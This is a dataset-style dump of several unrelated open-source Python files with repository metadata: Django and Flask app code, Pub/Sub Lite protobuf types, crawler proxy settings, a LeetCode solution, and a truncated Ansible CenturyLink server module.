DestHost=dest_host, Community=community)
return result
| [
"[email protected]"
]
| |
fd0a6ba9360c28449fd6b0848a7aecadab2791fb | 1e998b8aa40e29dd21e97b1071fc5dc46d4746c2 | /example/example/urls.py | 3f3d7176338ff3f5b14369d3c51078945a69d240 | [
"MIT"
]
| permissive | PragmaticMates/django-templates-i18n | 61786d0e3daf304316609fbf17f87f27457fdaae | 0dac1b8da498dc414d4836c1cf6cb82cb1597c26 | refs/heads/master | 2016-09-06T15:47:46.161242 | 2014-09-26T12:14:02 | 2014-09-26T12:14:02 | 22,213,677 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | from django.conf.urls import include, url
from django.conf.urls.i18n import i18n_patterns
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
from views import HomeView, MyView
admin.autodiscover()
urlpatterns = i18n_patterns('',
# Uncomment the admin/doc line below to enable admin documentation:
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
# Examples:
url(r'^my-view/$', MyView.as_view(), name='my_view'),
url(r'^$', HomeView.as_view(), name='home'),
)
| [
"[email protected]"
]
| |
ecae1e41c1a4dbea1e9f916e518c7a30df863ebe | bc9f66258575dd5c8f36f5ad3d9dfdcb3670897d | /lib/third_party/google/cloud/pubsublite_v1/types/topic_stats.py | 1ad03e069c7d8a1f576f2e229fdb25414030148e | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | google-cloud-sdk-unofficial/google-cloud-sdk | 05fbb473d629195f25887fc5bfaa712f2cbc0a24 | 392abf004b16203030e6efd2f0af24db7c8d669e | refs/heads/master | 2023-08-31T05:40:41.317697 | 2023-08-23T18:23:16 | 2023-08-23T18:23:16 | 335,182,594 | 9 | 2 | NOASSERTION | 2022-10-29T20:49:13 | 2021-02-02T05:47:30 | Python | UTF-8 | Python | false | false | 5,658 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.pubsublite_v1.types import common
from cloudsdk.google.protobuf import timestamp_pb2 # type: ignore
__protobuf__ = proto.module(
package="google.cloud.pubsublite.v1",
manifest={
"ComputeMessageStatsRequest",
"ComputeMessageStatsResponse",
"ComputeHeadCursorRequest",
"ComputeHeadCursorResponse",
"ComputeTimeCursorRequest",
"ComputeTimeCursorResponse",
},
)
class ComputeMessageStatsRequest(proto.Message):
r"""Compute statistics about a range of messages in a given topic
and partition.
Attributes:
topic (str):
Required. The topic for which we should
compute message stats.
partition (int):
Required. The partition for which we should
compute message stats.
start_cursor (google.cloud.pubsublite_v1.types.Cursor):
The inclusive start of the range.
end_cursor (google.cloud.pubsublite_v1.types.Cursor):
The exclusive end of the range. The range is empty if
end_cursor <= start_cursor. Specifying a start_cursor before
the first message and an end_cursor after the last message
will retrieve all messages.
"""
topic = proto.Field(proto.STRING, number=1,)
partition = proto.Field(proto.INT64, number=2,)
start_cursor = proto.Field(proto.MESSAGE, number=3, message=common.Cursor,)
end_cursor = proto.Field(proto.MESSAGE, number=4, message=common.Cursor,)
class ComputeMessageStatsResponse(proto.Message):
r"""Response containing stats for messages in the requested topic
and partition.
Attributes:
message_count (int):
The count of messages.
message_bytes (int):
The number of quota bytes accounted to these
messages.
minimum_publish_time (google.protobuf.timestamp_pb2.Timestamp):
The minimum publish timestamp across these
messages. Note that publish timestamps within a
partition are not guaranteed to be
non-decreasing. The timestamp will be unset if
there are no messages.
minimum_event_time (google.protobuf.timestamp_pb2.Timestamp):
The minimum event timestamp across these
messages. For the purposes of this computation,
if a message does not have an event time, we use
the publish time. The timestamp will be unset if
there are no messages.
"""
message_count = proto.Field(proto.INT64, number=1,)
message_bytes = proto.Field(proto.INT64, number=2,)
minimum_publish_time = proto.Field(
proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,
)
minimum_event_time = proto.Field(
proto.MESSAGE, number=4, message=timestamp_pb2.Timestamp,
)
class ComputeHeadCursorRequest(proto.Message):
r"""Compute the current head cursor for a partition.
Attributes:
topic (str):
Required. The topic for which we should
compute the head cursor.
partition (int):
Required. The partition for which we should
compute the head cursor.
"""
topic = proto.Field(proto.STRING, number=1,)
partition = proto.Field(proto.INT64, number=2,)
class ComputeHeadCursorResponse(proto.Message):
r"""Response containing the head cursor for the requested topic
and partition.
Attributes:
head_cursor (google.cloud.pubsublite_v1.types.Cursor):
The head cursor.
"""
head_cursor = proto.Field(proto.MESSAGE, number=1, message=common.Cursor,)
class ComputeTimeCursorRequest(proto.Message):
r"""Compute the corresponding cursor for a publish or event time
in a topic partition.
Attributes:
topic (str):
Required. The topic for which we should
compute the cursor.
partition (int):
Required. The partition for which we should
compute the cursor.
target (google.cloud.pubsublite_v1.types.TimeTarget):
Required. The target publish or event time.
Specifying a future time will return an unset
cursor.
"""
topic = proto.Field(proto.STRING, number=1,)
partition = proto.Field(proto.INT64, number=2,)
target = proto.Field(proto.MESSAGE, number=3, message=common.TimeTarget,)
class ComputeTimeCursorResponse(proto.Message):
r"""Response containing the cursor corresponding to a publish or
event time in a topic partition.
Attributes:
cursor (google.cloud.pubsublite_v1.types.Cursor):
If present, the cursor references the first message with
time greater than or equal to the specified target time. If
such a message cannot be found, the cursor will be unset
(i.e. ``cursor`` is not present).
"""
cursor = proto.Field(proto.MESSAGE, number=1, message=common.Cursor,)
__all__ = tuple(sorted(__protobuf__.manifest))
| [
"[email protected]"
]
| |
996e69c5148b5df26512a00ee71bb6d5b3048f9e | b805ded84cff8878ae70d772e50cface0c3aa45c | /proxy_pool/proxy_pool/settings.py | b6ecc4f6634f97f0ee761b1fd95cd587f2e5db95 | []
| no_license | CNZedChou/python-web-crawl-learning | 74f014fe95797d3f534e373de8451d2dfcc0600c | 5edf8f53e1bb9df3661ec007bb4d7f0ba04ab013 | refs/heads/master | 2022-11-10T08:26:53.275547 | 2020-07-06T02:33:03 | 2020-07-06T02:33:03 | 275,563,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # !/usr/bin/python3
# -*- coding: utf-8 -*-
"""
@Author : Zed
@Version : V1.0.0
------------------------------------
@File : settings.py
@Description : redis的密码,如果为空则表示没有密码
@CreateTime : 2020-6-30 11:22
------------------------------------
@ModifyTime :
"""
PASSWORD = ''
HOST = 'localhost'
PORT = '6379'
# 代理池的名称
PROXYPOOL = 'proxies'
TEST_API = 'https://www.baidu.com'
TEST_HEADERS ={
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36',
}
# 循环校验时间
CYCLE_VALID_TIME = 60
# 代理池数量的最小值
LOWER_NUM = 10
# 代理池数量的最大值
UPPER_NUM = 100
# 检查时间
CHECK_POOL_CYCLE = 60 | [
"[email protected]"
]
| |
15b0120a6df7223e01d2f3afa3879e7993d63438 | 174f848b62fb2ea0a1605e1aab70085ffd27ce50 | /beginning/age.py | 0540185272594c22e444e0b66ab14903a4e2d11f | []
| no_license | unet-echelon/by_of_python_lesson | cd71bd3890d42d49cc128ec1730371bf1b64dbfa | c6c5c917414ac98b6dfb582dc06c26d31ea5b30c | refs/heads/master | 2021-07-11T07:16:20.243347 | 2020-09-14T12:39:13 | 2020-09-14T12:39:13 | 201,041,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | #!/usr/bin/env python3
age = 26
name = 'kernel'
print('Возраст {0} -- {1} лет'.format(name,age))
print('Почему {0} забаляэеться с этим Python?'.format(name)) | [
"[email protected]"
]
| |
593eff5c51f3663c6b63401945d8e42c0bd744e9 | 1e9de96619592ed25c3a4ff57b6a78717882a709 | /app/resources/database.py | 970e203f904febf5289d936283299a350e6346e4 | []
| no_license | AntoineDao/example-service | 503d08788f7e557ee12f72fabfa537136b927d3f | 8b088ecd0a67642737a883d7f035722a8cd7a0b4 | refs/heads/master | 2020-04-22T07:13:59.199629 | 2019-02-07T17:36:17 | 2019-02-07T17:36:17 | 170,213,289 | 0 | 0 | null | 2019-02-11T22:32:16 | 2019-02-11T22:32:16 | null | UTF-8 | Python | false | false | 988 | py | import os
import datetime
import uuid
from flask_sqlalchemy import SQLAlchemy
import app
db = SQLAlchemy()
class Example(db.Model):
""" Example Model for storing example related details """
__tablename__ = "example"
id = db.Column(db.String(), primary_key=True, default=str(uuid.uuid4()))
email = db.Column(db.String(255), unique=True, nullable=False)
registered_on = db.Column(db.DateTime, nullable=False, default=datetime.datetime.utcnow())
admin = db.Column(db.Boolean, nullable=False, default=False)
username = db.Column(db.String(50), unique=True)
password_hash = db.Column(db.String(100))
test = db.Column(db.String(100))
def __repr__(self):
return "<User '{}'>".format(self.username)
@classmethod
def from_dict(cls, data):
new = cls(
id=data.get('id'),
email=data.get('email'),
admin=data.get('admin'),
username=data.get('username')
)
return new
| [
"[email protected]"
]
| |
c58f04c352758ec38036a3158f57cde81fbbd04f | 3879d1ca43c573c209f962182cd1e7f7fe978fbf | /leetcode/1973. Count Nodes Equal to Sum of Descendants/1973.py | 0b8f98e6fa4a8d999bcefc23edcbc239a22b78c5 | []
| no_license | DoctorLai/ACM | 34a5600a5adf22660c5d81b2d8b7a358be537ecf | aefa170f74c55c1230eb6f352770512b1e3f469e | refs/heads/master | 2023-09-01T02:13:01.604508 | 2023-08-31T15:42:07 | 2023-08-31T15:42:07 | 146,173,024 | 62 | 18 | null | 2020-10-11T13:19:57 | 2018-08-26T11:00:36 | C++ | UTF-8 | Python | false | false | 864 | py | # https://helloacm.com/teaching-kids-programming-count-nodes-equal-to-sum-of-descendants-recursive-depth-first-search-algorithm/
# https://leetcode.com/problems/count-nodes-equal-to-sum-of-descendants/
# MEDIUM, DFS, RECURSION
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def equalToDescendants(self, root: Optional[TreeNode]) -> int:
self.ans = 0
def dfs(root):
if not root:
return 0
lsum = dfs(root.left)
rsum = dfs(root.right)
if lsum + rsum == root.val:
self.ans += 1
return lsum + rsum + root.val
dfs(root)
return self.ans
| [
"[email protected]"
]
| |
0b205c12342378f7ce7b47dbe339627f706f8e2f | dd73faa1c747089c44dbe85e081de5a089046329 | /api_app/views/index_view.py | afa13a27813919ffbd4ba28140a04fb8d96188ab | []
| no_license | spaun299/api_tv_web | 34aaa6da5fc0f3154a5830953ec8e9ee90d1a3b0 | a19c0079e06a7c823236fda5ffe9d1e46a5e829d | refs/heads/master | 2021-01-10T03:39:25.309627 | 2016-02-12T10:26:34 | 2016-02-12T10:26:34 | 51,149,276 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from ..urls.blueprints import index_bp
from flask import render_template, g
from ..constants.constants import ACTIVE_PAGES
@index_bp.route('/')
@index_bp.route('/index')
def index():
return render_template('index.html', active_page=ACTIVE_PAGES['main'])
| [
"[email protected]"
]
| |
afc009bcd6b0b1e4386fb982e3e8419cfdd0b9d3 | eacff46eda2c6b509449979a16002b96d4645d8e | /Collections-a-installer/community-general-2.4.0/plugins/modules/cloud/centurylink/clc_server.py | 4e02421892d88000bc4739d6fdde7946a0d09ad2 | [
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later"
]
| permissive | d-amien-b/simple-getwordpress | 5e6d4d15d5f87124ab591e46b63fec552998fdc3 | da90d515a0aa837b633d50db4d91d22b031c04a2 | refs/heads/master | 2023-04-08T22:13:37.347545 | 2021-04-06T09:25:51 | 2021-04-06T09:25:51 | 351,698,069 | 0 | 0 | MIT | 2021-03-31T16:16:45 | 2021-03-26T07:30:00 | HTML | UTF-8 | Python | false | false | 56,728 | py | #!/usr/bin/python
#
# Copyright (c) 2015 CenturyLink
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
module: clc_server
short_description: Create, Delete, Start and Stop servers in CenturyLink Cloud.
description:
- An Ansible module to Create, Delete, Start and Stop servers in CenturyLink Cloud.
options:
additional_disks:
description:
- The list of additional disks for the server
type: list
elements: dict
default: []
add_public_ip:
description:
- Whether to add a public ip to the server
type: bool
default: 'no'
alias:
description:
- The account alias to provision the servers under.
type: str
anti_affinity_policy_id:
description:
- The anti-affinity policy to assign to the server. This is mutually exclusive with 'anti_affinity_policy_name'.
type: str
anti_affinity_policy_name:
description:
- The anti-affinity policy to assign to the server. This is mutually exclusive with 'anti_affinity_policy_id'.
type: str
alert_policy_id:
description:
- The alert policy to assign to the server. This is mutually exclusive with 'alert_policy_name'.
type: str
alert_policy_name:
description:
- The alert policy to assign to the server. This is mutually exclusive with 'alert_policy_id'.
type: str
count:
description:
- The number of servers to build (mutually exclusive with exact_count)
default: 1
type: int
count_group:
description:
- Required when exact_count is specified. The Server Group use to determine how many servers to deploy.
type: str
cpu:
description:
- How many CPUs to provision on the server
default: 1
type: int
cpu_autoscale_policy_id:
description:
- The autoscale policy to assign to the server.
type: str
custom_fields:
description:
- The list of custom fields to set on the server.
type: list
default: []
elements: dict
description:
description:
- The description to set for the server.
type: str
exact_count:
description:
- Run in idempotent mode. Will insure that this exact number of servers are running in the provided group,
creating and deleting them to reach that count. Requires count_group to be set.
type: int
group:
description:
- The Server Group to create servers under.
type: str
default: 'Default Group'
ip_address:
description:
- The IP Address for the server. One is assigned if not provided.
type: str
location:
description:
- The Datacenter to create servers in.
type: str
managed_os:
description:
- Whether to create the server as 'Managed' or not.
type: bool
default: 'no'
required: False
memory:
description:
- Memory in GB.
type: int
default: 1
name:
description:
- A 1 to 6 character identifier to use for the server. This is required when state is 'present'
type: str
network_id:
description:
- The network UUID on which to create servers.
type: str
packages:
description:
- The list of blue print packages to run on the server after its created.
type: list
elements: dict
default: []
password:
description:
- Password for the administrator / root user
type: str
primary_dns:
description:
- Primary DNS used by the server.
type: str
public_ip_protocol:
description:
- The protocol to use for the public ip if add_public_ip is set to True.
type: str
default: 'TCP'
choices: ['TCP', 'UDP', 'ICMP']
public_ip_ports:
description:
- A list of ports to allow on the firewall to the servers public ip, if add_public_ip is set to True.
type: list
elements: dict
default: []
secondary_dns:
description:
- Secondary DNS used by the server.
type: str
server_ids:
description:
- Required for started, stopped, and absent states.
A list of server Ids to insure are started, stopped, or absent.
type: list
default: []
elements: str
source_server_password:
description:
- The password for the source server if a clone is specified.
type: str
state:
description:
- The state to insure that the provided resources are in.
type: str
default: 'present'
choices: ['present', 'absent', 'started', 'stopped']
storage_type:
description:
- The type of storage to attach to the server.
type: str
default: 'standard'
choices: ['standard', 'hyperscale']
template:
description:
- The template to use for server creation. Will search for a template if a partial string is provided.
This is required when state is 'present'
type: str
ttl:
description:
- The time to live for the server in seconds. The server will be deleted when this time expires.
type: str
type:
description:
- The type of server to create.
type: str
default: 'standard'
choices: ['standard', 'hyperscale', 'bareMetal']
configuration_id:
description:
- Only required for bare metal servers.
Specifies the identifier for the specific configuration type of bare metal server to deploy.
type: str
os_type:
description:
- Only required for bare metal servers.
Specifies the OS to provision with the bare metal server.
type: str
choices: ['redHat6_64Bit', 'centOS6_64Bit', 'windows2012R2Standard_64Bit', 'ubuntu14_64Bit']
wait:
description:
- Whether to wait for the provisioning tasks to finish before returning.
type: bool
default: 'yes'
requirements:
- python = 2.7
- requests >= 2.5.0
- clc-sdk
author: "CLC Runner (@clc-runner)"
notes:
- To use this module, it is required to set the below environment variables which enables access to the
Centurylink Cloud
- CLC_V2_API_USERNAME, the account login id for the centurylink cloud
- CLC_V2_API_PASSWORD, the account password for the centurylink cloud
- Alternatively, the module accepts the API token and account alias. The API token can be generated using the
CLC account login and password via the HTTP api call @ https://api.ctl.io/v2/authentication/login
- CLC_V2_API_TOKEN, the API token generated from https://api.ctl.io/v2/authentication/login
- CLC_ACCT_ALIAS, the account alias associated with the centurylink cloud
- Users can set CLC_V2_API_URL to specify an endpoint for pointing to a different CLC environment.
'''
EXAMPLES = '''
# Note - You must set the CLC_V2_API_USERNAME And CLC_V2_API_PASSWD Environment variables before running these examples
- name: Provision a single Ubuntu Server
community.general.clc_server:
name: test
template: ubuntu-14-64
count: 1
group: Default Group
state: present
- name: Ensure 'Default Group' has exactly 5 servers
community.general.clc_server:
name: test
template: ubuntu-14-64
exact_count: 5
count_group: Default Group
group: Default Group
- name: Stop a Server
community.general.clc_server:
server_ids:
- UC1ACCT-TEST01
state: stopped
- name: Start a Server
community.general.clc_server:
server_ids:
- UC1ACCT-TEST01
state: started
- name: Delete a Server
community.general.clc_server:
server_ids:
- UC1ACCT-TEST01
state: absent
'''
RETURN = '''
server_ids:
description: The list of server ids that are created
returned: success
type: list
sample:
[
"UC1TEST-SVR01",
"UC1TEST-SVR02"
]
partially_created_server_ids:
description: The list of server ids that are partially created
returned: success
type: list
sample:
[
"UC1TEST-SVR01",
"UC1TEST-SVR02"
]
servers:
description: The list of server objects returned from CLC
returned: success
type: list
sample:
[
{
"changeInfo":{
"createdBy":"service.wfad",
"createdDate":1438196820,
"modifiedBy":"service.wfad",
"modifiedDate":1438196820
},
"description":"test-server",
"details":{
"alertPolicies":[
],
"cpu":1,
"customFields":[
],
"diskCount":3,
"disks":[
{
"id":"0:0",
"partitionPaths":[
],
"sizeGB":1
},
{
"id":"0:1",
"partitionPaths":[
],
"sizeGB":2
},
{
"id":"0:2",
"partitionPaths":[
],
"sizeGB":14
}
],
"hostName":"",
"inMaintenanceMode":false,
"ipAddresses":[
{
"internal":"10.1.1.1"
}
],
"memoryGB":1,
"memoryMB":1024,
"partitions":[
],
"powerState":"started",
"snapshots":[
],
"storageGB":17
},
"groupId":"086ac1dfe0b6411989e8d1b77c4065f0",
"id":"test-server",
"ipaddress":"10.120.45.23",
"isTemplate":false,
"links":[
{
"href":"/v2/servers/wfad/test-server",
"id":"test-server",
"rel":"self",
"verbs":[
"GET",
"PATCH",
"DELETE"
]
},
{
"href":"/v2/groups/wfad/086ac1dfe0b6411989e8d1b77c4065f0",
"id":"086ac1dfe0b6411989e8d1b77c4065f0",
"rel":"group"
},
{
"href":"/v2/accounts/wfad",
"id":"wfad",
"rel":"account"
},
{
"href":"/v2/billing/wfad/serverPricing/test-server",
"rel":"billing"
},
{
"href":"/v2/servers/wfad/test-server/publicIPAddresses",
"rel":"publicIPAddresses",
"verbs":[
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/credentials",
"rel":"credentials"
},
{
"href":"/v2/servers/wfad/test-server/statistics",
"rel":"statistics"
},
{
"href":"/v2/servers/wfad/510ec21ae82d4dc89d28479753bf736a/upcomingScheduledActivities",
"rel":"upcomingScheduledActivities"
},
{
"href":"/v2/servers/wfad/510ec21ae82d4dc89d28479753bf736a/scheduledActivities",
"rel":"scheduledActivities",
"verbs":[
"GET",
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/capabilities",
"rel":"capabilities"
},
{
"href":"/v2/servers/wfad/test-server/alertPolicies",
"rel":"alertPolicyMappings",
"verbs":[
"POST"
]
},
{
"href":"/v2/servers/wfad/test-server/antiAffinityPolicy",
"rel":"antiAffinityPolicyMapping",
"verbs":[
"PUT",
"DELETE"
]
},
{
"href":"/v2/servers/wfad/test-server/cpuAutoscalePolicy",
"rel":"cpuAutoscalePolicyMapping",
"verbs":[
"PUT",
"DELETE"
]
}
],
"locationId":"UC1",
"name":"test-server",
"os":"ubuntu14_64Bit",
"osType":"Ubuntu 14 64-bit",
"status":"active",
"storageType":"standard",
"type":"standard"
}
]
'''
__version__ = '${version}'
import json
import os
import time
import traceback
from distutils.version import LooseVersion
REQUESTS_IMP_ERR = None
try:
import requests
except ImportError:
REQUESTS_IMP_ERR = traceback.format_exc()
REQUESTS_FOUND = False
else:
REQUESTS_FOUND = True
#
# Requires the clc-python-sdk.
# sudo pip install clc-sdk
#
CLC_IMP_ERR = None
try:
import clc as clc_sdk
from clc import CLCException
from clc import APIFailedResponse
except ImportError:
CLC_IMP_ERR = traceback.format_exc()
CLC_FOUND = False
clc_sdk = None
else:
CLC_FOUND = True
from ansible.module_utils.basic import AnsibleModule, missing_required_lib
class ClcServer:
clc = clc_sdk
def __init__(self, module):
"""
Construct module
"""
self.clc = clc_sdk
self.module = module
self.group_dict = {}
if not CLC_FOUND:
self.module.fail_json(msg=missing_required_lib('clc-sdk'), exception=CLC_IMP_ERR)
if not REQUESTS_FOUND:
self.module.fail_json(msg=missing_required_lib('requests'), exception=REQUESTS_IMP_ERR)
if requests.__version__ and LooseVersion(
requests.__version__) < LooseVersion('2.5.0'):
self.module.fail_json(
msg='requests library version should be >= 2.5.0')
self._set_user_agent(self.clc)
def process_request(self):
"""
Process the request - Main Code Path
:return: Returns with either an exit_json or fail_json
"""
changed = False
new_server_ids = []
server_dict_array = []
self._set_clc_credentials_from_env()
self.module.params = self._validate_module_params(
self.clc,
self.module)
p = self.module.params
state = p.get('state')
#
# Handle each state
#
partial_servers_ids = []
if state == 'absent':
server_ids = p['server_ids']
if not isinstance(server_ids, list):
return self.module.fail_json(
msg='server_ids needs to be a list of instances to delete: %s' %
server_ids)
(changed,
server_dict_array,
new_server_ids) = self._delete_servers(module=self.module,
clc=self.clc,
server_ids=server_ids)
elif state in ('started', 'stopped'):
server_ids = p.get('server_ids')
if not isinstance(server_ids, list):
return self.module.fail_json(
msg='server_ids needs to be a list of servers to run: %s' %
server_ids)
(changed,
server_dict_array,
new_server_ids) = self._start_stop_servers(self.module,
self.clc,
server_ids)
elif state == 'present':
# Changed is always set to true when provisioning new instances
if not p.get('template') and p.get('type') != 'bareMetal':
return self.module.fail_json(
msg='template parameter is required for new instance')
if p.get('exact_count') is None:
(server_dict_array,
new_server_ids,
partial_servers_ids,
changed) = self._create_servers(self.module,
self.clc)
else:
(server_dict_array,
new_server_ids,
partial_servers_ids,
changed) = self._enforce_count(self.module,
self.clc)
self.module.exit_json(
changed=changed,
server_ids=new_server_ids,
partially_created_server_ids=partial_servers_ids,
servers=server_dict_array)
@staticmethod
def _define_module_argument_spec():
"""
Define the argument spec for the ansible module
:return: argument spec dictionary
"""
argument_spec = dict(
name=dict(),
template=dict(),
group=dict(default='Default Group'),
network_id=dict(),
location=dict(default=None),
cpu=dict(default=1, type='int'),
memory=dict(default=1, type='int'),
alias=dict(default=None),
password=dict(default=None, no_log=True),
ip_address=dict(default=None),
storage_type=dict(
default='standard',
choices=[
'standard',
'hyperscale']),
type=dict(default='standard', choices=['standard', 'hyperscale', 'bareMetal']),
primary_dns=dict(default=None),
secondary_dns=dict(default=None),
additional_disks=dict(type='list', default=[], elements='dict'),
custom_fields=dict(type='list', default=[], elements='dict'),
ttl=dict(default=None),
managed_os=dict(type='bool', default=False),
description=dict(default=None),
source_server_password=dict(default=None, no_log=True),
cpu_autoscale_policy_id=dict(default=None),
anti_affinity_policy_id=dict(default=None),
anti_affinity_policy_name=dict(default=None),
alert_policy_id=dict(default=None),
alert_policy_name=dict(default=None),
packages=dict(type='list', default=[], elements='dict'),
state=dict(
default='present',
choices=[
'present',
'absent',
'started',
'stopped']),
count=dict(type='int', default=1),
exact_count=dict(type='int', default=None),
count_group=dict(),
server_ids=dict(type='list', default=[], elements='str'),
add_public_ip=dict(type='bool', default=False),
public_ip_protocol=dict(
default='TCP',
choices=[
'TCP',
'UDP',
'ICMP']),
public_ip_ports=dict(type='list', default=[], elements='dict'),
configuration_id=dict(default=None),
os_type=dict(default=None,
choices=[
'redHat6_64Bit',
'centOS6_64Bit',
'windows2012R2Standard_64Bit',
'ubuntu14_64Bit'
]),
wait=dict(type='bool', default=True))
mutually_exclusive = [
['exact_count', 'count'],
['exact_count', 'state'],
['anti_affinity_policy_id', 'anti_affinity_policy_name'],
['alert_policy_id', 'alert_policy_name'],
]
return {"argument_spec": argument_spec,
"mutually_exclusive": mutually_exclusive}
def _set_clc_credentials_from_env(self):
"""
Set the CLC Credentials on the sdk by reading environment variables
:return: none
"""
env = os.environ
v2_api_token = env.get('CLC_V2_API_TOKEN', False)
v2_api_username = env.get('CLC_V2_API_USERNAME', False)
v2_api_passwd = env.get('CLC_V2_API_PASSWD', False)
clc_alias = env.get('CLC_ACCT_ALIAS', False)
api_url = env.get('CLC_V2_API_URL', False)
if api_url:
self.clc.defaults.ENDPOINT_URL_V2 = api_url
if v2_api_token and clc_alias:
self.clc._LOGIN_TOKEN_V2 = v2_api_token
self.clc._V2_ENABLED = True
self.clc.ALIAS = clc_alias
elif v2_api_username and v2_api_passwd:
self.clc.v2.SetCredentials(
api_username=v2_api_username,
api_passwd=v2_api_passwd)
else:
return self.module.fail_json(
msg="You must set the CLC_V2_API_USERNAME and CLC_V2_API_PASSWD "
"environment variables")
@staticmethod
def _validate_module_params(clc, module):
"""
Validate the module params, and lookup default values.
:param clc: clc-sdk instance to use
:param module: module to validate
:return: dictionary of validated params
"""
params = module.params
datacenter = ClcServer._find_datacenter(clc, module)
ClcServer._validate_types(module)
ClcServer._validate_name(module)
params['alias'] = ClcServer._find_alias(clc, module)
params['cpu'] = ClcServer._find_cpu(clc, module)
params['memory'] = ClcServer._find_memory(clc, module)
params['description'] = ClcServer._find_description(module)
params['ttl'] = ClcServer._find_ttl(clc, module)
params['template'] = ClcServer._find_template_id(module, datacenter)
params['group'] = ClcServer._find_group(module, datacenter).id
params['network_id'] = ClcServer._find_network_id(module, datacenter)
params['anti_affinity_policy_id'] = ClcServer._find_aa_policy_id(
clc,
module)
params['alert_policy_id'] = ClcServer._find_alert_policy_id(
clc,
module)
return params
@staticmethod
def _find_datacenter(clc, module):
"""
Find the datacenter by calling the CLC API.
:param clc: clc-sdk instance to use
:param module: module to validate
:return: clc-sdk.Datacenter instance
"""
location = module.params.get('location')
try:
if not location:
account = clc.v2.Account()
location = account.data.get('primaryDataCenter')
data_center = clc.v2.Datacenter(location)
return data_center
except CLCException:
module.fail_json(msg="Unable to find location: {0}".format(location))
@staticmethod
def _find_alias(clc, module):
"""
Find or Validate the Account Alias by calling the CLC API
:param clc: clc-sdk instance to use
:param module: module to validate
:return: clc-sdk.Account instance
"""
alias = module.params.get('alias')
if not alias:
try:
alias = clc.v2.Account.GetAlias()
except CLCException as ex:
module.fail_json(msg='Unable to find account alias. {0}'.format(
ex.message
))
return alias
@staticmethod
def _find_cpu(clc, module):
"""
Find or validate the CPU value by calling the CLC API
:param clc: clc-sdk instance to use
:param module: module to validate
:return: Int value for CPU
"""
cpu = module.params.get('cpu')
group_id = module.params.get('group_id')
alias = module.params.get('alias')
state = module.params.get('state')
if not cpu and state == 'present':
group = clc.v2.Group(id=group_id,
alias=alias)
if group.Defaults("cpu"):
cpu = group.Defaults("cpu")
else:
module.fail_json(
msg=str("Can\'t determine a default cpu value. Please provide a value for cpu."))
return cpu
@staticmethod
def _find_memory(clc, module):
"""
Find or validate the Memory value by calling the CLC API
:param clc: clc-sdk instance to use
:param module: module to validate
:return: Int value for Memory
"""
memory = module.params.get('memory')
group_id = module.params.get('group_id')
alias = module.params.get('alias')
state = module.params.get('state')
if not memory and state == 'present':
group = clc.v2.Group(id=group_id,
alias=alias)
if group.Defaults("memory"):
memory = group.Defaults("memory")
else:
module.fail_json(msg=str(
"Can\'t determine a default memory value. Please provide a value for memory."))
return memory
@staticmethod
def _find_description(module):
"""
Set the description module param to name if description is blank
:param module: the module to validate
:return: string description
"""
description = module.params.get('description')
if not description:
description = module.params.get('name')
return description
@staticmethod
def _validate_types(module):
"""
Validate that type and storage_type are set appropriately, and fail if not
:param module: the module to validate
:return: none
"""
state = module.params.get('state')
server_type = module.params.get(
'type').lower() if module.params.get('type') else None
storage_type = module.params.get(
'storage_type').lower() if module.params.get('storage_type') else None
if state == "present":
if server_type == "standard" and storage_type not in (
"standard", "premium"):
module.fail_json(
msg=str("Standard VMs must have storage_type = 'standard' or 'premium'"))
if server_type == "hyperscale" and storage_type != "hyperscale":
module.fail_json(
msg=str("Hyperscale VMs must have storage_type = 'hyperscale'"))
@staticmethod
def _validate_name(module):
"""
Validate that name is the correct length if provided, fail if it's not
:param module: the module to validate
:return: none
"""
server_name = module.params.get('name')
state = module.params.get('state')
if state == 'present' and (
len(server_name) < 1 or len(server_name) > 6):
module.fail_json(msg=str(
"When state = 'present', name must be a string with a minimum length of 1 and a maximum length of 6"))
@staticmethod
def _find_ttl(clc, module):
"""
Validate that TTL is > 3600 if set, and fail if not
:param clc: clc-sdk instance to use
:param module: module to validate
:return: validated ttl
"""
ttl = module.params.get('ttl')
if ttl:
if ttl <= 3600:
return module.fail_json(msg=str("Ttl cannot be <= 3600"))
else:
ttl = clc.v2.time_utils.SecondsToZuluTS(int(time.time()) + ttl)
return ttl
@staticmethod
def _find_template_id(module, datacenter):
"""
Find the template id by calling the CLC API.
:param module: the module to validate
:param datacenter: the datacenter to search for the template
:return: a valid clc template id
"""
lookup_template = module.params.get('template')
state = module.params.get('state')
type = module.params.get('type')
result = None
if state == 'present' and type != 'bareMetal':
try:
result = datacenter.Templates().Search(lookup_template)[0].id
except CLCException:
module.fail_json(
msg=str(
"Unable to find a template: " +
lookup_template +
" in location: " +
datacenter.id))
return result
@staticmethod
def _find_network_id(module, datacenter):
"""
Validate the provided network id or return a default.
:param module: the module to validate
:param datacenter: the datacenter to search for a network id
:return: a valid network id
"""
network_id = module.params.get('network_id')
if not network_id:
try:
network_id = datacenter.Networks().networks[0].id
# -- added for clc-sdk 2.23 compatibility
